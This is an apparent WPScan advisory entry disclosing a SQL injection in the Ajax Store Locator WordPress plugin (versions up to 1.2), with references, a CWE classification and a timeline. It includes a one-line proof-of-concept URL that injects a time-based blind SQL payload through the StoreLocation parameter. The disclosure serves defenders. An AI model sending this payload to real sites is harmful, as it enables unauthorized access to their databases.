Ajax Store Locator <= 1.2 - Remote SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Affects

Plugin ajax-store-locator

References

EXPLOITDB 36777
PACKETSTORM 131464
URL http://www.homelab.it/index.php/2015/04/15/wordpress-ajax-store-locator-sql-injection-vulnerability/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter pvdl
Views 140
Verified No
WPVDB ID 7907

Timeline

Publicly Published 2015-04-15 (over 1 year ago)
Added 2015-04-16 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.